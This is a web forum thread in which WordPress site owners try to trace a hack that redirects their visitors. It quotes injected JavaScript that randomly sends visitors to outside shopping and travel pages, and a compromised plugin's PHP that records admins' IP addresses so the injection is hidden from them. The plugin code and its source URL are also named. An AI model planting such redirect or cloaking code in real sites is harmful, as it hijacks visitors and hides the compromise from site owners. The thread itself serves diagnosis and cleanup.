We have a site redirects – Hacked to others sites, hacked with this link in somewhere, we can´t find it:

http://www.seo101.net/apntrack.js

 

Site redirects -Hacked code:

var hn=window.location.hostname;

var a=Math.floor(Math.random()*1000);

if (a<1) {

window.location.replace(“http://www.shoppingmonkey.co.uk/companies/hm/“);

} else if (a<1) {

window.location.replace(“http://www.thecrazytourist.com/14-must-visit-travel-destination-for-2015/6/“);

} else if (a<1) {

window.location.replace(“http://www.shoppingmonkey.co.uk/companies/house-fraser/“);

 

At this moment the code is growing…

Any help? After a week we don´t find any solution.

Thank you!

2 Comments

Danny Cheeseman · May 21, 2015 at 2:37 pm

For me, it was Plugin Name: Automatic Page Numbers – PageNavi.

The code was injected here:


function addContentPageNumbers($content = '') {

global $wp_query;

global $post;

$ip = $_SERVER['REMOTE_ADDR'];

if ( is_user_logged_in() ) {

update_option( 'pagenavi_auto_ip', $ip );

}

if ( !is_user_logged_in() && get_option('adsense_made_easy_ip')!=$ip) {

$content .= "\n";

}

return $content;

}

add_filter('the_content', 'addContentPageNumbers');

urban · May 21, 2015 at 2:56 pm

After 10 days hacked we found the script in the plugin “Adsense Made Easy ” Their website was http://www.seo101dotnet/ and the code was http://www.seo101dotnet/apntrack.js now their web is close, suspect? After we delete the code we have the same code but bigger in our theme head. The site redirects points were to the same sites:

http://www.thecrazytouristdotcom/14-must-visit-travel-destination-for-2015/6/
http://www.shoppingmonkeydotco.uk/companies/hm/
http://www.shoppingmonkeydotco.uk/companies/house-fraser/

All this been a nightmare for us.

Hope this info helps.

Leave a Reply

Your email address will not be published. Required fields are marked *

This site uses Akismet to reduce spam. Learn how your comment data is processed.